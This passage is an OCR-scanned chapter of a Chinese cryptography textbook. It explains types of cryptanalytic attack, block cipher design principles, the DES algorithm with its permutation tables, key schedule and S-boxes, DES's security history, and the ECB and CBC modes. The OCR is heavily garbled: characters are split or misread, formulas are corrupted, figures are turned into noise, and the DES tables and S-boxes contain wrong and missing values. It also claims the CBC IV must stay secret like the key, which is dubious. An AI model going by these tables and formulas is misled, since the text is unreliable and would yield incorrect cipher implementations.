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密码 分 析 学 是 伴随 着 密码 编码 学 的 产生 而 产生 的 , 它 是 研究 如 何 分 析 或 破解 各 种 密 
码 体制 的 一 门 科学 。 密 码 分 析 也 被 称 为 密码 攻击 ,是 指 非 授权 者 在 不 知道 解密 密 钥 的 条 
件 下 对 密 文 进行 分 析 , 试 图 得 到 明文 或 密 钥 的 过 程 。 

密码 分 析 可 以 发 现 密码 体制 的 弱点 ,密码 分 析 者 攻击 密码 体制 的 方法 主要 有 以 下 
三 种 : 

(1) 穷 举 攻击 : 密码 分 析 者 通过 试 遍 所 有 的 密 钥 来 进行 破译 。 穷 举 攻击 又 称 为 蛮 力 
攻击 ,是 指 攻击 者 依次 尝试 所 有 可 能 的 密 钥 对 所 截获 的 密 文 进行 解密 ,直至 得 到 正确 的 明 
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文 。1997 年 6 月 18 日 ,美国 科罗拉多 州 Rocket Verser 工作 小 组 宣布 ,通过 网 络 利用 数 
台 计 算 机 历时 4 个 多 月 以 穷 举 攻击 方式 攻破 了 DES。 

(2) 统计 分 析 攻 击 : 密码 分 析 者 通过 分 析 密 文 和 明文 的 统计 规律 来 破译 密码 。 统 计 
分 析 攻 击 在 历史 上 为 破译 密码 做 出 过 极 大 的 贡献 。 许 多 古典 密码 都 可 以 通过 分 析 密 文字 
母 和 字母 组 的 频率 及 其 统计 参数 而 破译 。 例 如 ,在 英语 里 ,字母 e 是 英文 文本 中 最 常用 的 
字母 ,字母 组 合 th 是 英文 文本 中 最 常用 的 字母 组 合 。 在 简单 的 蔡 换 密码 中 ,每 个 字母 只 
是 简单 地 被 替换 成 另 一 个 字母 ,那么 在 密 文中 出 现 频率 最 高 的 字母 就 最 有 可 能 是 e, 出 现 
频率 最 高 的 字母 组 合 就 最 有 可 能 是 th。 抵 抗 统计 分 析 攻 击 的 方式 是 在 密 文 中 消除 明文 
的 统计 特性 。 

(3) 数学 分 析 攻 击 : 密码 分 析 者 针对 加 密 算法 的 数学 特征 和 密码 学 特征 ,通过 数学 
求解 的 方法 来 设法 找到 相应 的 解密 变换 。 为 对 抗 这 种 攻击 ,应 该 选用 具有 坚实 的 数学 基 
础 和 足够 复杂 的 加 密 算法 。 

密码 攻击 和 解密 的 相似 之 处 在 于 都 是 设法 将 密 文 还 原 成 明文 的 过 程 ,但 攻击 者 和 消 
息 接 收 者 所 具备 的 条 件 是 不 同 的 。 密 码 分 析 者 的 任务 是 恢复 尽 可 能 多 的 明文 ,或 者 最 好 
能 推算 出 解密 密 钥 ,这 样 就 很 容易 解 出 被 加 密 的 信息 。 根 据 密 码 分 析 者 可 获取 的 信息 量 
不 同 ,常见 的 密码 分 析 攻 击 包括 以 下 4 种 类 型 ; 

(1) 唯 密 文 攻击 (ciphertext only attack) 。 密 码 分 析 者 除了 拥有 截获 的 密 文 外 (密码 
算法 是 公开 的 ,以 下 同 ) ,没有 其 他 可 以 利用 的 信息 。 这 种 攻击 的 方法 至 少 可 采用 穷 举 搜 
索 法 ,只 要 有 足够 多 的 计算 资源 和 存储 资源 ,理论 上 穷 举 搜索 是 可 以 成 功 的 ,但 实际 上 , 任 
何 一 种 能 保障 安全 要 求 的 算法 复杂 度 都 是 实际 攻击 者 无 法 承受 的 。 

(2) 已 知 明文 攻击 (known plaintext attack) 。 密 码 分 析 者 不 仅 掌握 了 相当 数量 的 密 
文 ,还 有 一 些 已 知 的 明 - 密 文 对 可 供 利 用 。 密 码 分 析 者 的 任务 就 是 用 密 文 信息 推出 解密 密 
钥 或 导出 一 个 替代 算法 ,此 算法 可 以 对 所 获得 的 密 文 恢 复出 相应 的 明文 。 在 现实 中 ,密码 
分 析 者 可 能 通过 各 种 手段 得 到 更 多 的 信息 ,而 且 明 文 消息 往往 采用 某 种 特定 的 格式 ,如 电 
子 现金 传送 消息 总 有 一 个 标准 的 报头 或 标题 等 等 。 

(3) 选择 明文 攻击 (chosen plaintext attack)。 密 码 分 析 者 不 仅 能 够 获得 一 定数 量 的 
明 - 密 文 对 ,还 可 以 选择 任何 明文 并 在 使 用 同一 未 知 密 钥 的 情况 下 能 得 到 相应 的 密 文 。 如 
果 攻 击 者 在 加 密 系统 中 能 选择 特定 的 明文 消息 , 则 通过 该 明文 消息 对 应 的 密 文 就 有 可 能 
确定 密 钥 的 结构 或 获取 更 多 关于 密 钥 的 信息 。 这 种 情况 往往 是 密码 分 析 者 通过 某 种 手段 
暂时 控制 加 密 机 。 根 据 非 对 称 密码 体制 的 特点 , 非 对 称 密码 算法 必须 经 受 住 这 种 攻击 。 

(4) 选择 密 文 攻击 (chosen ciphertext attack) 。 密 码 分 析 者 能 选择 不 同 的 密 文 , 并 还 
可 得 到 对 应 的 明文 。 如 果 攻 击 者 能 从 密 文中 选择 特定 的 密 文 消息 , 则 通过 该 密 文 消息 对 
应 的 明文 有 可 能 推导 出 密 钥 的 结构 或 产生 更 多 关于 密 钥 的 信息 。 这 种 情况 往往 是 密码 分 
析 者 通过 某 种 手段 暂时 控制 解密 机 。 

上 述 攻击 类 型 中 , 唯 密 文 攻击 的 强度 最 弱 ,其 他 情况 下 的 攻击 强度 依次 增加 。 当 然 密 
码 体制 的 攻击 不 限于 以 上 类 型 ,还 包括 一 些 非 技 术 手段 ,如 通过 威胁 勒索、 贿赂 等 方式 获 
取 密 钥 或 相关 信息 ,在 某 些 情况 下 这 些 手段 是 非常 有 效 的 攻击 ,但 不 是 本 章 所 关注 的 
内 容 。 
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4.2 ”对称 密码 体制 


对 称 密码 体制 是 加 密 密 钥 和 解密 密 钥 相同 的 密码 系统 ,是 建立 在 通信 双方 共享 密 钥 
的 基础 上 。 自 1977 年 美国 颁布 DES(Data Encryption Standard) 密 码 算法 作为 美国 数据 
加 密 标准 以 来 ,对 称 密码 体制 迅速 发 展 ,得 到 了 世界 各 国 的 关注 和 普遍 应 用 。 对 称 密码 体 
制 从 工作 方式 上 可 以 分 为 分 组 密码 和 序列 密码 两 大 类 。 本 节 将 对 这 两 类 密码 体制 进行 
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分 组 密码 (Block Cipher) 是 将 明文 消息 编码 后 的 序列 划分 成 固定 大 小 的 组 ,每 组 明文 
分 别 在 密 钥 的 控制 下 变 成 等 长 的 密 文 序列 。 这 里 我 们 主要 考虑 明文 编码 为 二 进 制 的 
情况 。 

设 n 是 一 个 分 组 密码 的 分 组 长 度 ,k 二 (ko ,ki1,…,k,1) 是 密 钥 。 分 组 密码 示意 图 如 
图 4-3 所 示 。z= 一 (zo,zi, ,Xs-1) 为 明文 ,其 中 x; E10,1},0i<n 一 1,y= (yoyyi""*， 
ym-1) 为 相应 的 密 文 ,其 中 y; E10,1} ,0 二 j 志 m 一 1, 则 y=E(k,x),z 二 D(k,y), 其 中 ED 
分 别 表示 加 密 变 换 和 解密 变换 。 

人 (ko (ok 


(Co 1) oyiym1) (Cox 
一 | 加 窗 算法 上 一 | 解密 算法 一 


图 4-3 分 组 密码 示意 图 


如 果 nn 二 m, 则 分 组 密码 对 明文 加 密 后 有 数据 扩展 。 如 果 nn 二 m, 则 分 组 密码 对 明文 加 
密 后 有 数据 压缩 。 如 果 一刀, 则 分 组 密码 对 明文 加 密 后 既 无 数据 扩展 也 无 数据 压缩 。 我 
们 通常 考虑 的 分 组 密码 都 是 这 种 既 无 数据 扩展 也 无 数据 压缩 的 分 组 密码 。 

由 于 分 组 密码 加 解密 速度 较 快 ,安全 性 好 ,以 及 得 到 许多 密码 芯片 的 支持 ,现代 分 组 
密码 发 展 非 常 快 ,在 许多 研究 领域 和 商用 系统 中 得 到 了 广泛 的 应 用 。 

1. 分 组 密码 的 基本 原理 

扩散 (Cdiffusion) 和 混 消 (confusion) 是 Shannon 提出 的 设计 密码 体制 的 两 种 基本 方 
法 ,其 目的 是 为 了 抵抗 攻击 者 对 密码 体制 的 统计 分 析 。 在 分 组 密码 的 设计 中 ,充分 利用 扩 
散 和 混淆 ,可 以 有 效 地 抵抗 攻击 者 从 密 文 的 统计 特性 推测 明文 或 密 钥 ,扩散 和 混淆 是 现代 
分 组 密码 的 设计 基础 。 

所 谓 扩散 就 是 让 明文 中 的 每 一 位 以 及 密 钥 中 的 每 一 位 能 够 影响 密 文中 的 许多 位 ,或 
者 说 让 密 文中 的 每 一 位 受 明 文 和 密 钥 中 的 许多 位 的 影响 。 这 样 可 以 隐蔽 明文 的 统计 特 
性 ,从 而 增加 密码 的 安全 性 。 当 然 , 理 想 的 情况 是 让 明文 中 的 每 一 位 影响 密 文中 的 所 有 
位 ,或 者 说 让 密 文中 的 每 一 位 受 明文 , 密 钥 中 所 有 位 的 影响 。 
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所 谓 混淆 就 是 将 密 文 与 明文 、 密 钥 之 间 的 统计 关系 变 得 尽 可 能 复杂 ,使 对 手 即使 获取 
了 关于 密 文 的 一 些 统计 特性 ,也 无 法 推测 密 钥 。 使 用 复杂 的 非 线性 代替 变换 可 以 达到 比 
较 好 的 混淆 效果 。 

可 以 用 * 揉 面团 ?来 形象 地 比喻 扩散 和 混淆 。 当 然 , 这 里 * 揉 面团 的 过 程 应 该 是 可 道 
的 。 在 设计 分 组 密码 时 通常 利用 乘积 和 迭代 的 方法 来 实现 扩散 和 混淆 。 

Si 和 S; 的 乘积 密码 体制 定义 为 S1 X Ss== (Mi XM:,C1XCz,KiX Ks,EXE:,DiX 
Ds), 其 中 Si 二 (Mi ,Ci ,Ki,Ei,Di) 和 S; 二 (M,C ,K,,E,,D;,) 是 两 个 密码 体制 。 在 实 
际 应 用 中 ,明文 空间 和 密 文 空间 往往 都 相同 , 即 Mi 一 Ms 二 Ci 二 C;, 则 乘积 密码 体制 S, x 
Ss; 可 简化 表示 为 Si XxS,=(M,M.,K! XxK;,,E, XE,,D XD:)。 对 任意 明文 EM 和 密 
钥 庆 二 (i,ko) EKiX Ki, 则 加 密 变 换 为 : El X Es (ki ,ks ,zx) 二 Es(ks,E1(k1,x))。 对 任意 
的 密 文 YE M 和 密 钥 &, 则 解密 变换 为 Di X D; (Ri ay) 一 DC ,DC y))。 

实际 上 ,乘积 密码 就 是 扩散 和 混 清 两 种 基本 密码 操作 的 组 合 变换 ,这 样 能 够 产生 比 各 
自 单独 使 用 时 更 强大 的 密码 系统 。 选 择 某 些 较 简单 的 受 密 钥 控 制 的 密码 变换 ,通过 乘积 
和 迭代 可 以 取得 比较 好 的 扩散 和 混淆 效果 。 例 如 : 代 换 -置换 网 络 (Substitution 
Permutation Network) 简 称 SP 网 络 ( 如 图 4-4 所 示 ) ,是 由 代 换 (也 称 S 盒 ) 和 置换 (也 称 
P 盒 ) 交 蔡 进行 多 次 而 形成 的 变化 网 络 。 代 换 起 到 混淆 的 作用 ,置换 起 到 扩散 的 作用 。 置 
换 不 等 同 于 扩散 ,多 轮 迭 代 并 同 代 换 结合 ,置换 能 产生 扩散 作用 。 代 换 常 被 划分 成 若干 子 
盒 , 它 是 许多 密码 算法 唯一 的 非 线 性 部 件 ,决定 了 整个 密码 算法 的 安全 强度 。 当 前 , 绝 大 
多 数 分 组 密码 算法 都 使 用 了 这 种 结构 。 


1 p | -一 1 
0 一 =| -| -| 1 
0 一 -| S 上 | SE SE-o 
0——| | | -| | 一 1 
0 一 ~| | | 0 
0——| -| -| | [0 
0—| S oS Fe S | 一 1 
0 一 =| 一 | -| —1 
0 一 =| -| | 1l 
0—| -| | 0 
0——| S -| S [el S | 一 1 
0 一 一 | -| -| —0 
0—— | 一 0 
0 三 =| 0 
0——| S S 一 | Sl 
0 一 一 | 他 


图 4-4 代 换 -置换 网 络 示意 图 


在 分 组 密码 发 展 的 二 十 多 年 间 ,密码 分 析 和 密码 设计 始终 是 相互 竞争 和 相互 推动 的 ， 
对 分 组 密码 安全 性 的 讨论 也 越 来 越 多 。 一 些 在 当时 被 认为 是 安全 的 算法 , 随 着 时 间 的 推 
移 和 密码 攻击 方法 ,计算 能 力 的 提高 ,已 被 攻破 。 例 如 已 广泛 使 用 了 二 十 多 年 的 数据 加 密 
标准 DES, 在 1997 年 6 月 18 日 ,被 美国 科罗拉多 州 的 一 个 以 Rocke Verser 为 首 的 工作 
组 破译 ,该 破译 小 组 成 员 利 用 美国 和 加 拿 大 联网 于 Internet 上 的 数 万 台 个 人 微机 的 空闲 
CPU 时 间 , 采 用 穷 举 搜索 技术 进行 破译 。 本 次 破译 成 功 宣布 了 DES 的 不 安全 性 ,同时 促 
使 美国 国家 标准 技术 所 (NIST) 推 出 新 的 高 级 加 密 标准 (AES)。 

目前 对 分 组 密码 安全 性 的 讨论 包括 差分 分 析 线性 分 析 、 穷 举 搜索 等 几 个 方面 。 从 理 
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论 上 讲 ,差分 密码 分 析 和 线性 密码 分 析 是 目前 攻击 分 组 密码 的 最 有 效 方法 ;而 从 实际 上 
说 , 穷 举 搜索 等 强力 攻击 是 攻击 分 组 密码 的 最 可 靠 方 法 。 截 止 到 现在 ,已 有 大 量 文献 对 分 
组 密码 的 设计 和 测试 进行 研究 ,并 归纳 出 许多 有 价值 的 设计 和 安全 性 准则 。 对 此 我 们 不 
准备 详 述 ,有 兴趣 的 读者 可 参阅 有 关 的 文献 。 在 设计 分 组 密码 时 ,应 该 充分 考虑 这 些 攻击 
方法 。 换 句 话 说 ,所 设计 的 分 组 密码 在 实现 扩散 和 混淆 的 同时 ,还 应 该 能 抵抗 所 有 已 知 的 
可 能 攻击 。 

2. 数据 加 密 标准 DES 

1977 年 1 月 ,美国 政府 宣布 : 将 IBM 公司 设计 的 方案 作为 非 机 密 数 据 的 正式 数据 加 
密 标 准 (Data Encryption Standard,DES)。DES 是 第 一 个 广泛 用 于 商用 数据 保密 的 密码 
算法 ,其 分 组 长 度 为 64 位 , 密 钥 长 度 也 为 64 位 (其 中 有 8 位 奇偶 校 验 位 , 故 实际 密 钥 长 度 
为 56 位 )。 尽 管 DES 目前 因 密 钥 空间 的 限制 ,已 经 被 高 级 加 密 标准 AES 取代 ,但 其 设计 
思想 仍 有 重要 的 参考 价值 。 

DES 加 密 算 法 的 结构 流程 如 图 4-5 所 示 。DES 首先 利用 初始 置换 对 明文 进行 换 位 
处 理 ,然后 进行 16 轮 迭 代 运 算 , 每 轮 都 由 加 密 的 两 个 基本 技术 一 一 混淆 和 扩散 组 合 而 成 ， 
最 后 通过 初始 置换 的 逆 置 换 获 得 密 文 。 


明文 一 Ri 密 钥 


初始 置换 扩展 置换 


1 

1 

1 

1 

1 

| 

| 

后 1 

16 轮 运算 >- | 

代 换 了 7 1 

1 

1 

1 P 合 置换 | | 

初 好 地 置换 | /|/ \ '! 一 —— -AL 
| 轮 函 数 F] | | 

密 文 密 钥 


图 4-5 ”DES 加 密 算法 结构 流程 图 


1) DES 加 密 算法 

设 工 = (zi1,zs，… ,ze ) 是 一 组 待 加 密 的 明文 块 ,其 中 x;€10,1) ,1 和;i 委 64。 

(1) 初始 置换 (IP)。 给 定 明文 zx, 通过 一 个 固定 的 初始 置换 IP( 如 表 4-2 所 示 ) 来 重 
排 输 入 明文 块 z 中 的 比特 ,得 到 比特 串 zx’ 二 IP(zx) 二 LoRo, 这 里 L。 和 R。 分 别 是 x 的 前 
32 比特 和 后 32 比特 。 初 始 置换 IP 用 于 对 明文 x 中 的 各 位 进行 换 位 ,目的 在 于 打 乱 明文 
工 中 各 位 的 次 序 。 经 过 初始 置换 后 ,z 变 为 x 二 x x2…zx'64 王 xsszxso…z1， 即 xz 中 的 第 58 
位 变 为 z' 中 的 第 一 位 , 依 此 类 推 。 
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表 4-2 初始 置换 IP 与 初始 逆 置 换 了 了 


初始 置换 IP 初始 逆 置 换 IP! 
58 | 50|42 |34|26|18|10|2|40|8 |48|16|56 |24|64| 32 
60 | 52|44|36|28|20|12|4|39|7 |47|15|55 |23|63 | 31 
62 | 54|46|38|30|22|14|6|38|6 |4|14|54|22|62| 30 
64|156|48|40|32|24|16|8|37| 5 |45|13|53|21|61| 29 
57 | 49 |141|33|25|17|9 1|36|4 |44|12|52|20|60 | 28 
59|151|43|35|27|19|11|3|35|3 |4|11|51|19|59|27 
61 | 53|45|37|29|21|13|5|34|2|142|10|50|18|58 | 26 
63 |55|47|39|31|23|15|7|33|1|14|9 |49|17|57| 25 


设 k=(ki,h,… ,kos), 其 中 ;E10,1) ,1 三 i 之 64。DES 中 与 密 钥 上 有 关 的 16 轮 迭 

代 可 以 形式 化 地 表示 为 

Li= Ri 

I = Li ©® fRi, K,) 
其 中 工 ; 和 R; 的 长 度 都 是 32 位 ,Lo 一 xix2…zxso ,Ro 一 zs3x4…zxh4，f 是 一 个 轮 函数 ,K; 是 
由 密 钥 k 产生 的 一 个 48 位 的 子 密 钥 。 

将 RisLis 进 行 初始 置换 IP 的 逆 置 换 处 理 后 就 得 到 密 文 > 一 (y ,ys，… ,yes)。 这 里 
RisLis 表 示 将 Lis 排 在 Ris 的 右边 。 不 将 Ris 与 Lis 左右 交换 而 直接 对 RisLie 进 行道 初始 置 
换 处 理 的 目的 是 为 了 使 加 密 和 解密 可 以 使 用 同一 算法 。 

(2) 子 密 钥 。 在 DES 算法 的 16 轮 迭 代 中 ,每 轮 都 需要 一 个 子 密 钥 K; 参与 。 从 密 钥 
k 生 成 子 密 钥 K; 的 算法 如 图 4-6 所 示 , 密 钥 & 中 有 8 位 是 奇偶 校 验 位 ,用 于 检查 密 钥 


64 位 密 钥 


一 1,2,…，16 


置换 选择 1 
Co(28 位 ) Do(28 位 ) 
1 
LS, Ls 
Ci(28 位 ) Di(28 位 ) 
~ 置换 选择 2 | 一 K 
(56 位 ) 
1 1 
LS,s [ss 
1 1 
| cwQsfy) Did28 位 ) 
一 | 选择 2 上 一 
Go 置换 选择 i 


图 4-6 子 密 钥 生 成 算法 结构 图 
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在 产生 、 分 发 以 及 存储 过 程 中 可 能 发 生 的 错误 。 


置换 选择 1( 见 表 4-3) 用 于 去 掉 & 密 钥 中 的 校 验 位 ,并 对 其 余 56 位 打 乱 重新 排列 。 
置换 选择 1 的 输出 中 前 28 位 作为 Cu, 后 28 位 作为 De 。 对 于 1 二 i 二 16, 有 
人 SG 
全 = LS,(D; 1) 
其 中 LS; 表示 对 Ci-; 或 D;_1 进 行 循 环 左 移 变换 。 当 i 二 1,2,9,16 时 ,LS; 是 循环 左 移 1 
位 ,其 余 的 LS; 是 循环 左 移 2 位 变换 。CiD; 的 长 度 为 56 位 ,置换 选择 2 用 于 从 CiD; 中 
选取 48 位 作为 子 密 钥 K;。 和 置换 选择 2 如 表 4-3 所 示 。 


表 4-3 置换 选择 1 和 置换 选择 2 


置换 选择 1 置换 选择 2 
57 49 41 33 25 17 9 14 17 11 24 hn 5 
1 58 50 42 34 26 18 3 28 15 6 21 10 
10 2 59 51 43 35 27 23 19 12 4 26 8 
19 11 3 60 52 44 36 16 27 20 13 2 
63 55 47 39 31 23 15 41 52 31 37 47 55 
了 62 54 46 38 30 22 30 40 51 45 33 48 
14 6 61 53 45 37 29 44 49 39 56 34 53 
21 13 5 28 20 12 4 46 42 50 36 29 32 


K(48 位 ) 


\s 5 / \ Ss SY Ss / \ Ss Ss 本 


P 傅 置换 (32 位 ) 


| 


RDKJG32 位 ) 
图 4-7 辊 函数 了 的 计算 过 程 


在 每 轮 计算 中 ,扩展 置换 ( 见 表 4-4) 用 于 先 将 32 位 的 输入 扩展 为 48 位 ,然后 与 子 密 
钥 进 行 按 位 模 2 加 运算 ,对 运算 结果 从 左 到 右 分 为 8 组 (每 组 6 位 ) ,分 别 输入 到 8 个 S 盒 
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中 ( 见 表 4-5) ,再 用 了 盒 置 换 ( 见 表 4-4) 对 S 盒 代 换 后 的 输出 进行 换 位 处 理 后 就 得 到 


RD 
表 4-4 扩展 置换 和 P 盒 置换 
扩展 置换 P 盒 置换 
32 01 02 03 04 05 16 7 20 21 
04 05 06 07 08 09 29 12 28 17 
08 09 10 和 12 13 1 15 23 26 
12 13 14 15 16 17 5 18 31 10 
16 于 18 19 20 21 2 8 24 14 
20 21 22 23 24 25 32 27 3 9 
24 25 26 27 28 29 19 13 30 6 
28 29 30 31 32 01 22 i 4 25 


表 4-5 轮 函 数 / 中 使 用 的 8 个 S 盒 
S1 


14 4 13 3 2 15 1 8 3 10 6 12 5 9 0 7 


0 15 7 4 15 2 13 1 10 6 12 11 9 5 3 8 
4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0 
15 12 8 2 4 9 1 必 5 11 3 14 10 0 6 13 


15 8 14 6 11 3 4 9 


3 13 4 . 15 2 8 14 12 


0 14 7 11 10 4 13 1 5 12 6 9 


oo 
~ 
a 


mlmo|lol|l~ 


13 8 10 & 3 15 4 2 11 ? 12 0 5 14 9 


10 0 9 14 6 3 15 5 L 13 12 和 加 4 2 8 


13 4 0 9 


13 6 4 9 15 3 0 11 1 2 12 5 10 14 和 


lw|lw 


12 8 11 5 6 15 0 3 4 CA 2 12 1 10 14 9 
10 6 9 0 12 11 村 13 15 1 3 14 5 2 8 4 
3 15 0 6 10 [| 13 8 9 4 5 11 12 7 2 14 


2 12 4 出 7 10 11 6 8 5 3 15 13 0 14 9 


14 11 2 12 4 a 13 5 0 15 10 3 9 8 6 


10 15 4 2 7 12 9 5 6 1 13 14 0 11 3 8 


4 11 2 14 15 0 8 13 3 12 9 7 5 10 6 1 


1 4 11 13 12 3 7 14 10 15 6 8 0 5 9 2 


" 11 4 a. 9 12 14 2 0 6 10 13 15 3 5 8 


2 1 14 7 4 10 8 13 15 12 a 0 3 5 6 11 


2) DES 解密 过 程 

DES 算法 是 对 称 的 , 既 可 用 于 加 密 又 可 用 于 解密 。 只 不 过 在 16 次 迭代 中 使 用 的 子 
密 钥 的 次 序 正好 相反 。 解 密 时 ,第 一 次 近代 使 用 子 密 钥 Kie ,依次 类 推 。 解 密 过 程 的 16 
次 迭代 可 以 形式 化 表示 为 

但 二 让 
Li = R; © f(Li, Ki) 

3) DES 的 安全 性 

在 DES 中 ,初始 置换 IP 和 道 初 始 置 换 IP :各 使 用 一 次 ,使 用 这 两 个 置换 的 目的 是 为 
了 把 数据 彻底 打 乱 重新 排列 。 它 们 对 数据 加 密 所 起 的 作用 不 大 ,因为 它们 与 密 钥 无 关 且 
置换 关系 固定 ,所 以 一 旦 公开 ,它们 对 数据 的 加 密 便 无 多 大 价值 。 

由 前 面 的 算法 介绍 不 难看 出 ,在 DES 算法 加 密 过 程 中 除了 S 盒 是 非 线性 变换 外 ,其 
余 变 换 均 为 线性 变换 。 因 此 ,S 盒 是 DES 算法 安全 的 关键 。 任 意 改变 S 盒 输入 中 的 一 
位 ,其 输出 至 少 有 两 位 发 生变 化 。 由 于 在 DES 中 使 用 了 16 次 迭代 ,所 以 即使 改变 明文 或 
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密 钥 中 的 1 位 , 密 文 中 都 会 大 约 有 32 位 发 生变 化 。S 盒 的 设计 原则 一 直 没 有 完全 公开 。 
人 们 怀疑 S 盒 的 设计 中 可 能 隐藏 着 某 种 陷 门 , 它 可 以 使 了 解 陷 门 的 人 能 够 成 功 地 进行 密 
码 分 析 。 经 过 多 年 来 的 研究 ,人 们 的 确 发 现 了 S 盒 的 许多 规律 ,但 至 今 还 没有 发 现 S 盒 的 
致命 缺陷 。 

由 于 DES 算法 是 公开 的 ,因此 其 安全 性 完全 依赖 于 所 用 的 密 钥 。 在 算法 使 用 过 程 
中 ,每 次 迭代 时 都 有 一 个 子 密 钥 供 加 密使 用 。 子 密 钥 的 产生 也 很 有 特色 , 它 确 保密 钥 中 各 
位 的 使 用 次 数 基本 相等 。 实 验 表明 ,56 位 密 钥 中 每 位 的 使 用 次 数 在 12 次 至 15 次 之 间 。 
在 实际 使 用 中 ,需要 注意 的 是 DES 算法 存在 一 些 弱 密 钥 。 所 谓 弱 密 钥 是 指 一 个 密 钥 产生 
的 所 有 子 密 钥 都 是 相同 的 ,此 时 对 消息 加 密 两 次 就 可 以 恢复 出 明文 。 虽 然 DES 算法 有 弱 
密 钥 现 象 , 但 是 弱 密 钥 所 占 比 例 很 小 ,可 以 在 选取 密 钥 时 避 开 使 用 ,因此 对 其 安全 性 影响 
不 大 。 

随 着 密码 分 析 技 术 和 计算 能 力 的 提高 ,DES 的 安全 性 受到 质疑 和 威胁 。 密 钥 长 度 较 
短 是 DES 的 一 个 主要 缺陷 。DES 的 实际 密 钥 长 度 为 56 位 , 密 钥 量 仅 为 2*” 守 1017, 就 目 
前 计算 设备 的 计算 能 力 而 言 ,DES 不 能 抵抗 对 密 钥 的 穷 举 搜索 攻击 。1998 年 7 月 ,电子 
边境 基金 会 (EFF) 使 用 一 台 价 值 25 万 美元 的 计算 机 在 56 小 时 内 成 功 地 破译 了 DES。 在 
1999 年 1 月 ,电子 边境 基金 会 (EFF) 仅 用 22 小 时 15 分 就 成 功 地 破译 了 DES。 

DES 的 密 钥 长 度 被 证 明 不 能 满足 安全 需求 ,为 了 提高 DES 的 安全 性 能 ,并 充分 利用 
有 关 DES 的 软件 和 硬件 资源 ,人 们 提出 一 种 简单 的 改进 方案 一 一 使 用 多 重 DES。 多 重 
DES 就 是 使 用 多 个 密 钥 利用 DES 对 明文 进行 多 次 加 密 。 如 三 重 DES 可 将 密 钥 长 度 增加 
到 112 位 或 者 168 位 ,可 以 提高 抵抗 对 密 钥 穷 举 搜索 攻击 的 能 力 。 除 密 钥 长 度 因 素 外 ， 
DES 加 密 算法 还 有 一 些 其 他 缺陷 ,如 在 软件 环境 下 实现 效率 较 低 。 因 此 ,美国 已 经 正式 
公布 实施 高 级 加 密 标 准 AES 算法 用 于 取代 DES 算法 。 

3. 分 组 密码 的 工作 模式 

分 组 密码 是 将 消息 作为 数据 分 组 来 加 密 或 解密 的 ,而 实际 应 用 中 大 多 数 消息 的 长 度 
是 不 定 的 ,数据 格式 也 不 同 。 当 消息 长 度 大 于 分 组 长 度 时 ,需要 分 成 几 个 分 组 分 别 进行 处 
理 。 为 了 能 灵活 地 运用 基本 的 分 组 密码 算法 ,人 们 设计 了 不 同 的 处 理 方式 , 称 为 分 组 密码 
的 工作 模式 ,也 称 为 分 组 密码 算法 的 运行 模式 。 

这 些 分 组 模式 能 够 为 密 文 组 提供 一 些 其 他 的 性 质 ,例如 隐藏 明文 的 统计 特性 、 数 据 格 
式 、 控 制 错误 传播 等 ,以 提高 整体 的 安全 性 ,降低 删除 . 重 放 、 插 入 和 伪造 等 攻击 的 机 会 。 
工作 模式 通常 是 基本 密码 模块 .反馈 和 一 些 简单 运算 的 组 合 ,应 当 力求 简单 ` 有 效 和 易于 
实现 。 

本 节 介 绍 四 个 常用 的 工作 模式 , 即 电子 编码 本 (Electronic Code Book ,ECB) 模 式 、 密 
码 分 组 链接 (Cipher Block Chaining,CBC) 模 式 、 输 出 反馈 (Output FeedBack,OFB) 模 式 、 
密码 反馈 (Cipher FeedBack,CFB) 模 式 。 

1) 电子 编码 本 模式 

分 组 密码 在 ECB 模式 工作 下 ,如 图 4-8 所 示 , 首 先 将 明文 消息 分 成 个 m 比特 组 ,如 
果 明 文 长 度 不 是 m 的 整数 倍 , 则 在 明文 末尾 填充 适当 数目 的 规定 符号 ,使 长 度 为 m 比特 
的 整数 倍 。 对 每 个 明文 组 用 给 定 的 密 钥 分 别 进行 加 密 , 生 成 个 相应 的 密 文 组 。 解 密 和 
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加 密 的 工作 模式 基本 一 致 。 


加 密 过 程 
明文 分 组 Pi 明文 分 组 Pa 明文 分 组 P。 
党 rt | 密 : 1 
客 明 -| 加 密 | 客 角 -| 力 密 |-------- 家 .| 加 窗 
1 1 
密 文 分 组 C | “|[ 密 文 分 组 C， 密 文 分 组 C， 
解密 过 程 
密 文 分 组 Ci | 密 文 分 组 C， 密 文 分 组 C， 
密 密 密 下 
密 钥 -| 解密 槛 胃 -| 解密 十- te 密 钥 。 [解密 
1 和 
明文 分 组 P | 明文 分 组 Pa 明文 分 组 P， 


图 4-8 电子 编码 本 (ECB) 模 式 


EBC 模式 是 最 容易 的 运行 模式 ,每 个 明文 分 组 可 以 被 独立 地 运行 加 密 , 因 此 可 以 并 
行 实现 。 在 误差 传播 方面 ,单个 密 文 分 组 中 有 一 个 或 多 个 比特 错误 只 会 影响 该 分 组 的 解 
密 结 果 ,错误 传播 较 小 。 但 这 种 模式 下 ,相同 明文 (在 相同 密 钥 下 ) 得 出 相同 的 密 文 ,容易 
实现 统计 分 析 攻 击 。 

2) 密码 分 组 链接 模式 

在 CBC 模式 下 ,如 图 4-9 所 示 ,每 个 明文 组 在 加 密 前 与 前 一 组 密 文 按 位 异 或 运算 后 ， 
再 进行 加 密 变 换 , 首 个 明文 组 与 一 个 初始 向 量 IV 异 或 运算 。 采 用 CBC 方式 加 密 ,要 求 收 
发 双方 共享 加 密 密 钥 和 初始 向 量 IV。 解 密 时 每 组 密 文 先进 行 解密 ,再 与 前 组 密 文 进行 异 


加 密 过 程 
明文 分 组 P 明文 分 组 P, | 明文 分 组 P， 
“0 1 
密 钥 | 
解密 + 
| 1 
密 文 分 组 C 密 文 分 组 |-- 密 文 分 组 C， 
解密 过 程 
密 文 分 组 C 密 文 分 组 Gs] 密 文 分 组 C 
1 
7 1 解密 
IV -由 
1 1 
明文 分 组 P 明文 分 组 P| 明文 分 组 P。 


图 4-9 ”密码 分 组 链接 (CBC) 模 式 
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或 运算 ,还 原 出 该 组 明文 。 

使 用 CBC 模式 时 ,初始 化 向 量 IV 同 密 钥 一 样 需要 保密 。 由 于 引入 的 反馈 机 制 ,因而 
每 个 密 文 分 组 不 仅 依赖 于 产生 它 的 明文 分 组 ,还 依赖 于 它 前 面 的 所 有 分 组 ,不 能 进行 并 行 
处 理 。 相 同 的 明文 ,即使 相同 的 密 钥 下 也 会 得 到 不 同 的 密 文 分 组 ,隐藏 了 明文 的 统计 特 
性 。 同 时 , 密 文 分 组 中 的 一 个 单 比特 错误 会 影响 到 本 组 和 其 后 一 个 分 组 的 解密 ,错误 传播 
为 两 组 。 

3) 密码 反馈 模式 

